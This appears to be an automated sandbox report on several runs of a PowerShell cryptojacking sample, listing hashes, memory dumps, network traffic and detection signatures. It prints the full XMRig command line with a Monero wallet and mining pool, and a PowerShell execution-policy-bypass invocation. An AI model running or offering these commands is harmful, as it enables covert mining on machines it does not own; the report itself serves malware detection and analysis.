"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

memory/2060-0-0x00007FFCB8943000-0x00007FFCB8945000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xydjy1zt.cam.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2060-7-0x000001D07C7B0000-0x000001D07C7D2000-memory.dmp

memory/2060-11-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/2060-12-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/2060-14-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/2060-15-0x000001D07C830000-0x000001D07C842000-memory.dmp

memory/2060-16-0x000001D07C800000-0x000001D07C80A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1564-47-0x000002087C1B0000-0x000002087C1D0000-memory.dmp

memory/2060-48-0x000001D07CD20000-0x000001D07CF3C000-memory.dmp

memory/1564-49-0x000002087DAF0000-0x000002087DB10000-memory.dmp

memory/1564-51-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/2060-53-0x00007FFCB8943000-0x00007FFCB8945000-memory.dmp

memory/1564-52-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/2060-54-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/1564-56-0x000002087DB30000-0x000002087DB50000-memory.dmp

memory/1564-55-0x000002087DB10000-0x000002087DB30000-memory.dmp

memory/1564-57-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/2060-58-0x00007FFCB8940000-0x00007FFCB9401000-memory.dmp

memory/1564-59-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-61-0x000002087DB30000-0x000002087DB50000-memory.dmp

memory/1564-60-0x000002087DB10000-0x000002087DB30000-memory.dmp

memory/1564-62-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-63-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-64-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-65-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-66-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-67-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-68-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-69-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-70-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-71-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-72-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-73-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-74-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-75-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-76-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-77-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-78-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-79-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-80-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-81-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-82-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-83-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-84-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-85-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-86-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-87-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-88-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-89-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-90-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-91-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-92-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-93-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-94-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-95-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-96-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-97-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-98-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-99-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-100-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-101-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-102-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-103-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-104-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-105-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-106-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-107-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-108-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-109-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-110-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-111-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-112-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-113-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-114-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-115-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-116-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-117-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

memory/1564-118-0x00007FF755DC0000-0x00007FF7569F3000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:30

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1766s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3900-4-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp

memory/3900-5-0x0000027B7C110000-0x0000027B7C132000-memory.dmp

memory/3900-6-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-9-0x0000027B7C2E0000-0x0000027B7C356000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zop4j3sg.gvv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3900-20-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-25-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-48-0x0000027B7C2A0000-0x0000027B7C2B2000-memory.dmp

memory/3900-61-0x0000027B7BC30000-0x0000027B7BC3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4908-90-0x0000023B37630000-0x0000023B37650000-memory.dmp

memory/4908-91-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-92-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/3900-93-0x00007FFC8AAB3000-0x00007FFC8AAB4000-memory.dmp

memory/3900-94-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/3900-95-0x00007FFC8AAB0000-0x00007FFC8B49C000-memory.dmp

memory/4908-96-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-97-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-98-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-99-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-100-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-101-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-102-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-103-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-104-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-105-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-106-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-107-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-108-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-109-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-110-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-111-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-112-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-113-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-114-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-115-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-116-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-117-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-118-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-119-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-120-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-121-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-122-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-123-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-124-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-125-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-126-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-127-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-128-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-129-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-130-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-131-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-132-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-133-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-134-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-135-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-136-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-137-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-138-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-139-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-140-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-141-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-142-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-143-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-144-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-145-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-146-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-147-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-148-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-149-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-150-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-151-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-152-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-153-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-154-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-155-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

memory/4908-156-0x00007FF65A1E0000-0x00007FF65AE13000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:42

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1768s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

memory/4336-0-0x00007FFCCBE63000-0x00007FFCCBE65000-memory.dmp

memory/4336-1-0x000001B06B100000-0x000001B06B122000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jktc3ejw.1sk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4336-11-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/4336-12-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/4336-14-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/4336-15-0x000001B06BFF0000-0x000001B06C002000-memory.dmp

memory/4336-16-0x000001B06BB20000-0x000001B06BB2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1420-47-0x000001F9C0C50000-0x000001F9C0C70000-memory.dmp

memory/1420-48-0x000001F9C2450000-0x000001F9C2470000-memory.dmp

memory/1420-49-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-50-0x000001F9C2490000-0x000001F9C24B0000-memory.dmp

memory/1420-51-0x000001F9C2470000-0x000001F9C2490000-memory.dmp

memory/4336-52-0x00007FFCCBE63000-0x00007FFCCBE65000-memory.dmp

memory/1420-53-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/4336-54-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/1420-55-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/4336-56-0x00007FFCCBE60000-0x00007FFCCC921000-memory.dmp

memory/1420-59-0x000001F9C2470000-0x000001F9C2490000-memory.dmp

memory/1420-58-0x000001F9C2490000-0x000001F9C24B0000-memory.dmp

memory/1420-57-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-60-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-61-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-62-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-63-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-64-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-65-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-66-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-67-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-68-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-69-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-70-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-71-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-72-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-73-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-74-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-75-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-76-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-77-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-78-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-79-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-80-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-81-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-82-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-83-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-84-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

